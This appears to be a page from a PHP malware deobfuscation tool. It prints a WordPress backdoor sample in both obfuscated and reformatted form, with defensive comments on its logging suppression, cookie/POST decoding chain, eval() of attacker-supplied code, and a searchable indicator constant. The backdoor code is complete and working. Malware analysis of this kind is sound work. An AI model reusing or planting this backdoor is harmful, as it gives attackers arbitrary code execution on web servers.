
PHP deobfuscation, decryption, reconstruction tool

Deobfuscate PHP malware, viruses and tampered code found on WordPress sites back into readable code.

*Please note that not every obfuscation scheme can be decoded.

The code below was decoded.

<?php $j5056231 = 265; $GLOBALS['tfa259'] = array(); global $tfa259; $tfa259 = $GLOBALS; $GLOBALS['l39c'] = "QC6&a~\$c^1 > lyK + dp)bfP\rzZG%., e2]|\\`@nRXkE0 } (OTv = 5L; ShVB\n_ - W / H { < \tsm:FxI[wN * j9'D3!g4AuJi8 ?Yo\"Mtq#Ur7"; $tfa259["zb853b580"] = "chr"; $tfa259["i5695cb"] = "...



Obfuscated PHP code

<?php $j5056231 = 265;
// Sample under analysis (setup half). These statements build an indirection
// table: later code calls PHP functions only through $tfa259[...], so no
// function name appears at the call sites. $j5056231 above is assigned but
// never read anywhere in this listing.
$GLOBALS['tfa259'] = array();
global $tfa259;
// NOTE(review): the code below writes $tfa259["j046"] and then reads $j046 as
// a global, so it depends on writes to this copy of $GLOBALS reaching the
// global symbol table. Presumably that relies on pre-8.1 $GLOBALS semantics;
// confirm against the PHP version of the affected host.
$tfa259 = $GLOBALS;
// Lookup string: single characters are picked from it by numeric offset and
// concatenated to form the table keys defined on the following lines.
// NOTE(review): as printed here the literal contains spaces and line breaks
// that appear to have been inserted by a code formatter; the offsets used
// later line up with the key names only when that whitespace is ignored.
// Analyse the raw file from disk, not this rendering.
$GLOBALS['l39c'] = "QC6&a~\$c^1 > lyK + dp)bfP\rzZG%., e2]|\\`@nRXkE0
}

(OTv = 5L;
ShVB\n_ - W / H { < \tsm:FxI[wN * j9'D3!g4AuJi8 ?Yo\"Mtq#Ur7";

// Table entries: opaque key => name of a PHP function, invoked later as
// $tfa259[key](...).
$tfa259["zb853b580"] = "chr";

$tfa259["i5695cb"] = "ord";

$tfa259["wd8d"] = "strlen";

$tfa259["y97692979"] = "define";

$tfa259["id59ec8"] = "defined";

$tfa259["f803d"] = "ini_set";

$tfa259["obe5"] = "serialize";

$tfa259["s21148f"] = "phpversion";

$tfa259["g7f068"] = "unserialize";

$tfa259["qf92d7d0e"] = "base64_decode";

$tfa259["je59e0"] = "set_time_limit";

// These two entries name the sample's own helper functions.
$tfa259["p56623830"] = "s83ceb3";

$tfa259["ea8143686"] = "pa6885f";

// Request data is stored in the same table: the sample takes its input from
// POST fields and cookies.
$tfa259["qa480a2"] = $_POST;

$tfa259["v09de2"] = $_COOKIE;

// Unsets the error-log destination and turns log_errors off; the leading @
// also hides any warning raised by these calls themselves. The effect is that
// the sample's activity leaves no PHP error-log entries.
@ini_set("error_log", NULL);

@ini_set("log_errors", 0);

// Removes the script execution time limit.
@ini_set("max_execution_time", 0);

@set_time_limit(0);

// Main body of the sample: a backdoor that decodes one request value and,
// if it carries the embedded identifier, either reports the PHP version or
// passes attacker-supplied text to eval(). The offsets into $tfa259['l39c']
// resolve to the table keys named in the comments below only when the
// whitespace a formatter appears to have inserted into that string is ignored.
// The ALREADY_RUN_ constant is a fixed string, so it is a convenient indicator
// to search for across the web root.
if (!defined("ALREADY_RUN_366afb8a8a2355ab21fbf11ba1a02fba")) {

    define("ALREADY_RUN_366afb8a8a2355ab21fbf11ba1a02fba", 1);

    $tdf3557 = NULL;

    $o631 = NULL;

    // Identifier embedded in this copy of the sample; read back below as the
    // global $j046, both as an XOR key and as the value a request must carry.
    $tfa259["j046"] = "fb279ac6-69f3-45c2-bc3d-9bbf7fd99d4a";

    global $j046;

    // Repeating-key XOR of $tdf3557 with key $j289. The indirect calls resolve
    // to "wd8d" (strlen), "i5695cb" (ord) and "zb853b580" (chr).
    function pa6885f($tdf3557, $j289)

    {

        global $tfa259;

        $se7a15f9 = "";

        for ($gf62d = 0; $gf62d < $tfa259[$tfa259['l39c'][70] . $tfa259['l39c'][15] . $tfa259['l39c'][85] . $tfa259['l39c'][15]]($tdf3557);) {

            for ($w9ba63a = 0; $w9ba63a < $tfa259[$tfa259['l39c'][70] . $tfa259['l39c'][15] . $tfa259['l39c'][85] . $tfa259['l39c'][15]]($j289) && $gf62d < $tfa259[$tfa259['l39c'][70] . $tfa259['l39c'][15] . $tfa259['l39c'][85] . $tfa259['l39c'][15]]($tdf3557); $w9ba63a++, $gf62d++) {

                $se7a15f9 .= $tfa259[$tfa259['l39c'][22] . $tfa259['l39c'][18] . $tfa259['l39c'][85] . $tfa259['l39c'][47] . $tfa259['l39c'][77] . $tfa259['l39c'][18] . $tfa259['l39c'][47] . $tfa259['l39c'][85] . $tfa259['l39c'][40]]($tfa259[$tfa259['l39c'][84] . $tfa259['l39c'][47] . $tfa259['l39c'][2] . $tfa259['l39c'][74] . $tfa259['l39c'][47] . $tfa259['l39c'][7] . $tfa259['l39c'][18]]($tdf3557[$gf62d]) ^ $tfa259[$tfa259['l39c'][84] . $tfa259['l39c'][47] . $tfa259['l39c'][2] . $tfa259['l39c'][74] . $tfa259['l39c'][47] . $tfa259['l39c'][7] . $tfa259['l39c'][18]]($j289[$w9ba63a]));

            }

        }

        return $se7a15f9;

    }

    // Two XOR passes through pa6885f (table key "ea8143686"): first with the
    // embedded identifier $j046, then with $j289.
    function s83ceb3($tdf3557, $j289)

    {

        global $tfa259;

        global $j046;

        return $tfa259[$tfa259['l39c'][28] . $tfa259['l39c'][4] . $tfa259['l39c'][85] . $tfa259['l39c'][9] . $tfa259['l39c'][80] . $tfa259['l39c'][77] . $tfa259['l39c'][2] . $tfa259['l39c'][85] . $tfa259['l39c'][2]]($tfa259[$tfa259['l39c'][28] . $tfa259['l39c'][4] . $tfa259['l39c'][85] . $tfa259['l39c'][9] . $tfa259['l39c'][80] . $tfa259['l39c'][77] . $tfa259['l39c'][2] . $tfa259['l39c'][85] . $tfa259['l39c'][2]]($tdf3557, $j046), $j289);

    }

    // Walks the entry stored under "v09de2" ($_COOKIE); after the loop the
    // last cookie's value and name are kept.
    foreach ($tfa259[$tfa259['l39c'][45] . $tfa259['l39c'][40] . $tfa259['l39c'][74] . $tfa259['l39c'][15] . $tfa259['l39c'][28] . $tfa259['l39c'][29]] as $j289 => $r2a770) {

        $tdf3557 = $r2a770;

        $o631 = $j289;

    }

    // No usable cookie value: fall back to the entry under "qa480a2" ($_POST).
    if (!$tdf3557) {

        foreach ($tfa259[$tfa259['l39c'][93] . $tfa259['l39c'][4] . $tfa259['l39c'][80] . $tfa259['l39c'][85] . $tfa259['l39c'][40] . $tfa259['l39c'][4] . $tfa259['l39c'][29]] as $j289 => $r2a770) {

            $tdf3557 = $r2a770;

            $o631 = $j289;

        }

    }

    // Decode pipeline, innermost call first: "qf92d7d0e" (base64_decode), then
    // "p56623830" (s83ceb3, keyed with the field name), then "g7f068"
    // (unserialize). Errors are suppressed with @.
    $tdf3557 = @$tfa259[$tfa259['l39c'][79] . $tfa259['l39c'][97] . $tfa259['l39c'][19] . $tfa259['l39c'][40] . $tfa259['l39c'][2] . $tfa259['l39c'][85]]($tfa259[$tfa259['l39c'][16] . $tfa259['l39c'][47] . $tfa259['l39c'][2] . $tfa259['l39c'][2] . $tfa259['l39c'][29] . $tfa259['l39c'][77] . $tfa259['l39c'][85] . $tfa259['l39c'][77] . $tfa259['l39c'][40]]($tfa259[$tfa259['l39c'][93] . $tfa259['l39c'][19] . $tfa259['l39c'][74] . $tfa259['l39c'][29] . $tfa259['l39c'][15] . $tfa259['l39c'][97] . $tfa259['l39c'][15] . $tfa259['l39c'][40] . $tfa259['l39c'][28]]($tdf3557), $o631));

    // Acts only when a field of the decoded array equals the embedded
    // identifier (loose == comparison).
    if (isset($tdf3557[$tfa259['l39c'][4] . $tfa259['l39c'][38]]) && $j046 == $tdf3557[$tfa259['l39c'][4] . $tfa259['l39c'][38]]) {

        // First action: reply with a serialized array holding the result of
        // "s21148f" (phpversion) and a fixed version-like string, via "obe5"
        // (serialize).
        if ($tdf3557[$tfa259['l39c'][4]] == $tfa259['l39c'][84]) {

            $gf62d = array($tfa259['l39c'][16] . $tfa259['l39c'][45] => @$tfa259[$tfa259['l39c'][63] . $tfa259['l39c'][29] . $tfa259['l39c'][9] . $tfa259['l39c'][9] . $tfa259['l39c'][80] . $tfa259['l39c'][85] . $tfa259['l39c'][19]](), $tfa259['l39c'][63] . $tfa259['l39c'][45] => $tfa259['l39c'][9] . $tfa259['l39c'][26] . $tfa259['l39c'][40] . $tfa259['l39c'][56] . $tfa259['l39c'][9]);

            echo @$tfa259[$tfa259['l39c'][89] . $tfa259['l39c'][18] . $tfa259['l39c'][28] . $tfa259['l39c'][47]]($gf62d);
        } elseif ($tdf3557[$tfa259['l39c'][4]] == $tfa259['l39c'][28]) {

            // Second action: a field of the decoded array is executed as PHP.
            // This is arbitrary code execution in the web server's context and
            // is the reason a file containing this block must be treated as a
            // full compromise of the site, not as an isolated bad file.
            eval($tdf3557[$tfa259['l39c'][15]]);
}

// Ends the request here, so the page the host file normally renders is not
// produced for an accepted request.
exit;
}

}

Decoded (deobfuscated) PHP code

<?php

// Defender's reading of this sample: a request-driven PHP backdoor. The
// statements below build an indirection table so that later code never names
// a PHP function at its call site, which defeats simple keyword scans. Note
// that this "decoded" output is reformatted only; the indirect calls further
// down are still unresolved.
$j5056231 = 265; // assigned but never read anywhere in this listing
$GLOBALS['tfa259'] = array();
global $tfa259;
// NOTE(review): later code writes $tfa259["j046"] and then reads $j046 as a
// global, so it depends on writes to this copy of $GLOBALS reaching the global
// symbol table. Presumably that relies on pre-8.1 $GLOBALS semantics; confirm
// against the PHP version of the affected host.
$tfa259 = $GLOBALS;
// Lookup string: single characters are picked from it by numeric offset and
// concatenated to form the table keys defined just below.
// NOTE(review): as printed, the literal contains spaces around some symbols
// and "\r\n" sequences that appear to have been introduced by the formatter.
// The offsets used later match the key names below (e.g. 70,15,85,15 giving
// "wd8d") only when that added whitespace is ignored, so any analysis should
// start from the raw file on disk rather than from this rendering.
$GLOBALS['l39c'] = "QC6&a~\$c^1 > lyK + dp)bfP\rzZG%., e2]|\\`@nRXkE0\r\n}\r\n\r\n(OTv = 5L;\r\nShVB\n_ - W / H { < \tsm:FxI[wN * j9'D3!g4AuJi8 ?Yo\"Mtq#Ur7";
// Table entries: opaque key => name of a PHP function, invoked later as
// $tfa259[key](...).
$tfa259["zb853b580"] = "chr";
$tfa259["i5695cb"] = "ord";
$tfa259["wd8d"] = "strlen";
$tfa259["y97692979"] = "define";
$tfa259["id59ec8"] = "defined";
$tfa259["f803d"] = "ini_set";
$tfa259["obe5"] = "serialize";
$tfa259["s21148f"] = "phpversion";
$tfa259["g7f068"] = "unserialize";
$tfa259["qf92d7d0e"] = "base64_decode";
$tfa259["je59e0"] = "set_time_limit";
// These two entries name the sample's own helper functions.
$tfa259["p56623830"] = "s83ceb3";
$tfa259["ea8143686"] = "pa6885f";
// Request data is stored in the same table: input is taken from POST fields
// and cookies.
$tfa259["qa480a2"] = $_POST;
$tfa259["v09de2"] = $_COOKIE;
// Unsets the error-log destination and turns log_errors off; the leading @
// also hides any warning raised by these calls themselves. The sample's
// activity therefore leaves no PHP error-log entries, so file-integrity
// comparison is a more reliable way to find it than log review.
@ini_set("error_log", NULL);
@ini_set("log_errors", 0);
// Removes the script execution time limit.
@ini_set("max_execution_time", 0);
@set_time_limit(0);
// Main body of the sample. It decodes one request value and, if that value
// carries the embedded identifier, either reports the PHP version or passes
// attacker-supplied text to eval().
//
// Reading aid: the offsets into $tfa259['l39c'] resolve to the table keys
// named in the comments below only when the whitespace that a formatter
// appears to have inserted into that string is ignored.
//
// Run-once guard: the body executes only if this constant is not yet defined.
// The constant name is a fixed string and so a convenient indicator to search
// for across the web root.
if (!defined("ALREADY_RUN_366afb8a8a2355ab21fbf11ba1a02fba")) {
    define("ALREADY_RUN_366afb8a8a2355ab21fbf11ba1a02fba", 1);
    $tdf3557 = NULL; // request value first, decoded array later
    $o631 = NULL;    // name (key) of that request value
    // Identifier embedded in this copy of the sample. It is read back below as
    // the global $j046, where it serves both as an XOR key and as the value a
    // decoded request must carry before anything is acted on.
    $tfa259["j046"] = "fb279ac6-69f3-45c2-bc3d-9bbf7fd99d4a";
    global $j046;
    /**
     * Repeating-key XOR: each byte of $tdf3557 is XORed with the key byte at
     * the matching position, the key being reused cyclically.
     *
     * The indirect calls resolve to the table keys "wd8d" (strlen),
     * "i5695cb" (ord) and "zb853b580" (chr).
     *
     * @param string $tdf3557 data to transform (indexed byte by byte)
     * @param string $j289    key
     * @return string one output byte per input byte
     */
    function pa6885f($tdf3557, $j289)
    {
        global $tfa259;
        $se7a15f9 = "";
        // The outer loop has no increment of its own; the inner loop advances
        // both the key offset and the data offset.
        for ($gf62d = 0; $gf62d < $tfa259[$tfa259['l39c'][70] . $tfa259['l39c'][15] . $tfa259['l39c'][85] . $tfa259['l39c'][15]]($tdf3557);) {
            for ($w9ba63a = 0; $w9ba63a < $tfa259[$tfa259['l39c'][70] . $tfa259['l39c'][15] . $tfa259['l39c'][85] . $tfa259['l39c'][15]]($j289) && $gf62d < $tfa259[$tfa259['l39c'][70] . $tfa259['l39c'][15] . $tfa259['l39c'][85] . $tfa259['l39c'][15]]($tdf3557); $w9ba63a++, $gf62d++) {
                $se7a15f9 .= $tfa259[$tfa259['l39c'][22] . $tfa259['l39c'][18] . $tfa259['l39c'][85] . $tfa259['l39c'][47] . $tfa259['l39c'][77] . $tfa259['l39c'][18] . $tfa259['l39c'][47] . $tfa259['l39c'][85] . $tfa259['l39c'][40]]($tfa259[$tfa259['l39c'][84] . $tfa259['l39c'][47] . $tfa259['l39c'][2] . $tfa259['l39c'][74] . $tfa259['l39c'][47] . $tfa259['l39c'][7] . $tfa259['l39c'][18]]($tdf3557[$gf62d]) ^ $tfa259[$tfa259['l39c'][84] . $tfa259['l39c'][47] . $tfa259['l39c'][2] . $tfa259['l39c'][74] . $tfa259['l39c'][47] . $tfa259['l39c'][7] . $tfa259['l39c'][18]]($j289[$w9ba63a]));
            }
        }
        return $se7a15f9;
    }
    /**
     * Two XOR passes through pa6885f (reached via table key "ea8143686"):
     * first with the embedded identifier $j046, then with $j289.
     *
     * @param string $tdf3557 data to transform
     * @param string $j289    second-pass key
     * @return string result of the second pass
     */
    function s83ceb3($tdf3557, $j289)
    {
        global $tfa259;
        global $j046;
        return $tfa259[$tfa259['l39c'][28] . $tfa259['l39c'][4] . $tfa259['l39c'][85] . $tfa259['l39c'][9] . $tfa259['l39c'][80] . $tfa259['l39c'][77] . $tfa259['l39c'][2] . $tfa259['l39c'][85] . $tfa259['l39c'][2]]($tfa259[$tfa259['l39c'][28] . $tfa259['l39c'][4] . $tfa259['l39c'][85] . $tfa259['l39c'][9] . $tfa259['l39c'][80] . $tfa259['l39c'][77] . $tfa259['l39c'][2] . $tfa259['l39c'][85] . $tfa259['l39c'][2]]($tdf3557, $j046), $j289);
    }
    // Walks the entry stored under "v09de2" ($_COOKIE); every iteration
    // overwrites the two variables, so the last cookie's value and name win.
    foreach ($tfa259[$tfa259['l39c'][45] . $tfa259['l39c'][40] . $tfa259['l39c'][74] . $tfa259['l39c'][15] . $tfa259['l39c'][28] . $tfa259['l39c'][29]] as $j289 => $r2a770) {
        $tdf3557 = $r2a770;
        $o631 = $j289;
    }
    // No usable cookie value: fall back to the entry under "qa480a2" ($_POST).
    if (!$tdf3557) {
        foreach ($tfa259[$tfa259['l39c'][93] . $tfa259['l39c'][4] . $tfa259['l39c'][80] . $tfa259['l39c'][85] . $tfa259['l39c'][40] . $tfa259['l39c'][4] . $tfa259['l39c'][29]] as $j289 => $r2a770) {
            $tdf3557 = $r2a770;
            $o631 = $j289;
        }
    }
    // Decode pipeline, innermost call first: "qf92d7d0e" (base64_decode), then
    // "p56623830" (s83ceb3, keyed with the field name in $o631), then "g7f068"
    // (unserialize). Errors are suppressed with @. Because the request value
    // is XORed and base64-encoded, it carries no fixed plaintext for a request
    // filter to match on.
    $tdf3557 = @$tfa259[$tfa259['l39c'][79] . $tfa259['l39c'][97] . $tfa259['l39c'][19] . $tfa259['l39c'][40] . $tfa259['l39c'][2] . $tfa259['l39c'][85]]($tfa259[$tfa259['l39c'][16] . $tfa259['l39c'][47] . $tfa259['l39c'][2] . $tfa259['l39c'][2] . $tfa259['l39c'][29] . $tfa259['l39c'][77] . $tfa259['l39c'][85] . $tfa259['l39c'][77] . $tfa259['l39c'][40]]($tfa259[$tfa259['l39c'][93] . $tfa259['l39c'][19] . $tfa259['l39c'][74] . $tfa259['l39c'][29] . $tfa259['l39c'][15] . $tfa259['l39c'][97] . $tfa259['l39c'][15] . $tfa259['l39c'][40] . $tfa259['l39c'][28]]($tdf3557), $o631));
    // Acts only when a field of the decoded array equals the embedded
    // identifier (loose == comparison); every other request falls through and
    // the host page renders normally.
    if (isset($tdf3557[$tfa259['l39c'][4] . $tfa259['l39c'][38]]) && $j046 == $tdf3557[$tfa259['l39c'][4] . $tfa259['l39c'][38]]) {
        // First action: reply with a serialized array holding the result of
        // "s21148f" (phpversion) and a fixed version-like string, emitted via
        // "obe5" (serialize).
        if ($tdf3557[$tfa259['l39c'][4]] == $tfa259['l39c'][84]) {
            $gf62d = array($tfa259['l39c'][16] . $tfa259['l39c'][45] => @$tfa259[$tfa259['l39c'][63] . $tfa259['l39c'][29] . $tfa259['l39c'][9] . $tfa259['l39c'][9] . $tfa259['l39c'][80] . $tfa259['l39c'][85] . $tfa259['l39c'][19]](), $tfa259['l39c'][63] . $tfa259['l39c'][45] => $tfa259['l39c'][9] . $tfa259['l39c'][26] . $tfa259['l39c'][40] . $tfa259['l39c'][56] . $tfa259['l39c'][9]);
            echo @$tfa259[$tfa259['l39c'][89] . $tfa259['l39c'][18] . $tfa259['l39c'][28] . $tfa259['l39c'][47]]($gf62d);
        } elseif ($tdf3557[$tfa259['l39c'][4]] == $tfa259['l39c'][28]) {
            // Second action: a field of the decoded array is executed as PHP.
            // This is arbitrary code execution in the web server's context.
            // A file containing this block means the site is compromised:
            // deleting the block does not explain how it was written there, so
            // review other modified files and rotate credentials as well.
            eval($tdf3557[$tfa259['l39c'][15]]);
        }
        // Ends the request here, so the page the host file normally renders is
        // not produced for an accepted request.
        exit;
    }
}

